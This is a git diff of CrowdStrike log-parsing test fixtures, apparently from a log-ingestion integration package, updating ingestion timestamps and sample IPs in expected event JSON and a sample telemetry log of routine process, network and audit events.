\"Timestamp\": \"2020-07-20T12:41:44Z\",\n \"TreeID\": \"\"\n }\n}", "code": "FirewallRuleIP4Matched", "kind": "event", 
@@ -108,7 +108,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-08-13T09:13:03.062180200Z", + "ingested": "2021-12-09T13:36:09.744778800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57181,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1595005328414,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1595005316,\n \"IncidentEndTime\": 1595005316,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:1234567893cd4e55b3a832ba2140478e:72e291e40c1544d390eabf135d875e54\",\n \"State\": \"open\",\n \"FineScore\": 0.1,\n \"LateralMovement\": 0\n }\n}", "kind": "alert", "action": "incident", @@ -145,7 +145,7 @@ }, { "source": { - "ip": "165.225.220.184" + "ip": "67.43.156.15" }, "message": "Crowdstrike Authentication", "tags": [ 
@@ -161,12 +161,12 @@
 "first.last@company.com"
 ],
 "ip": [
- "165.225.220.184"
+ "67.43.156.15"
 ]
 },
 "event": {
- "ingested": "2021-08-13T09:13:03.062185300Z",
- "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"165.225.220.184\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\": \"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}",
+ "ingested": "2021-12-09T13:36:09.744784800Z",
+ "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"67.43.156.15\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\":
\"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}",
 "category": [
 "authentication"
 ],
@@ -178,7 +178,7 @@
 },
 "crowdstrike": {
 "event": {
- "UserIp": "165.225.220.184",
+ "UserIp": "67.43.156.15",
 "OperationName": "saml2Assert",
 "ServiceName": "Crowdstrike Authentication",
 "UserId": "first.last@company.com",
@@ -231,7 +231,7 @@
 ]
 },
 "event": {
- "ingested": "2021-08-13T09:13:03.062189600Z",
+ "ingested": "2021-12-09T13:36:09.744790600Z",
 "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70683,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1595248885000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"ab1cde05567b455b93afbe2d3df352c9_328024a065630f897f09963d4b67b0c95d4054f540c2ca8014d5b012718bfa21\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1595248885\n }\n}",
 "kind": "event",
 "action": "user_activity_audit_event",
@@ -293,7 +293,7 @@
 "name": "TESTDEVICE01"
 },
 "event": {
- "ingested": "2021-08-13T09:13:03.062198Z",
+ "ingested": "2021-12-09T13:36:09.744796500Z",
 "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57217,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1595006093000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1595006093\n }\n}",
 "kind": "event",
 "action": [
@@ -349,7 +349,7 @@
 "name": "TESTDEVICE01"
 },
 "event": {
- "ingested": "2021-08-13T09:13:03.062207500Z",
+ "ingested": "2021-12-09T13:36:09.744802300Z",
 "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57269,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1595006899000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1595006899,\n \"Commands\": [\n \"cd \\\\Program Files (x86)\\\\Symantec\",\n \"ls .\",\n \"cd \\\\Program Files (x86)\",\n \"ls .\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"reg set HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default GroupingTags -ValueType=```REG_SZ``` -Value=```Protect```\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"restart\",\n \"restart -Confirm\"\n ]\n }\n}",
 "kind": "event",
 "action": [
@@ -466,7 +466,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-08-13T09:13:03.062211300Z",
+ "ingested": "2021-12-09T13:36:09.744808Z",
 "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57047,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1595002291000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1595002290,\n \"ProcessEndTime\": 1595002290,\n \"ProcessId\": 663790158277,\n \"ParentProcessId\": 627311656469,\n \"ComputerName\": \"TESTDEVICE01\",\n \"UserName\": \"First.last\",\n \"DetectName\": \"NGAV\",\n \"DetectDescription\": \"This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.\",\n \"Severity\": 2,\n \"SeverityName\": \"Low\",\n \"FileName\": \"filename.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\",\n \"CommandLine\": \"\\\"C:\\\\ProgramData\\\\file\\\\path\\\\filename.exe\\\" \",\n \"SHA256String\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"MD5String\": \"0ab1235adca04aef6239f5496ef0a5df\",\n \"SHA1String\": \"0000000000000000000000000000000000000000\",\n \"MachineDomain\": \"NA\",\n \"ExecutablesWritten\": [\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n
\"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n }\n ],\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/activity/detections/detail/1abcd2345b8c4151a0cb45dcfbe6d3d0/124559902719?_cid=12345a1bc2d34fghi56jk7890lmno12p\",\n \"SensorId\": \"1abcd2345b8c4151a0cb45dcfbe6d3d0\",\n \"IOCType\": \"hash_sha256\",\n \"IOCValue\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"DetectId\": \"ldt:1abcd2345b8c4151a0cb45dcfbe6d3d0:124559902719\",\n \"LocalIP\": \"10.1.190.117\",\n \"MACAddress\": \"54-ad-d4-d2-a8-0b\",\n \"Tactic\": \"Machine Learning\",\n \"Technique\": \"Sensor-based ML\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Detection, process would have been blocked if related prevention policy setting was enabled.\",\n \"PatternDispositionValue\": 2304,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": false,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": true,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": true,\n \"RegistryOperationBlocked\": false,\n \"CriticalProcessDisabled\": false,\n \"BootupSafeguardEnabled\": false,\n \"FsOperationBlocked\": false\n },\n \"ParentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\explorer.exe\",\n \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"GrandparentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\System32\\\\userinit.exe\",\n \"GrandparentCommandLine\": \"C:\\\\Windows\\\\system32\\\\userinit.exe\"\n }\n}",
 "kind": "alert",
 "action": "Detection, process would have been blocked if related prevention policy setting was enabled.",
diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log
index 291c2e82b95..ebf722dbd86 100644
--- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log
+++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log
@@ -1,125 +1,125 @@
-{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"208.210.242.193","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"208.254.115.95","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0","RemoteAddressIP6":"ff88:1:1:ffff:1014:ce99:9b06:ab12","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"208.126.205.223","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"208.130.207.129","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"208.49.81.196","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"208.24.129.49","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"208.230.0.2","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"LocalAddressIP4":"208.30.0.2","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"208.215.150.206","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"208.187.110.246","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"208.194.125.248","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"208.24.230.3","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"}
-{"LocalAddressIP4":"208.230.137.65","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"208.254.169.254","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"208.231.69.37","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"208.203.151.21","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"208.169.10.84","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"208.231.69.37","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"208.187.110.246","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"}
-{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"208.223.60.11","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"208.208.21.205","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"208.198.160.35","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"}
-{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"208.180.129.90","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"}
-{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"ff88:1:1:ffff:440a:57ff:fe3a:8abc","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"208.203.151.21","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"208.130.71.241","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"}
-{"LocalAddressIP4":"208.210.109.249","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"208.233.129.250","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"208.216.236.59","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
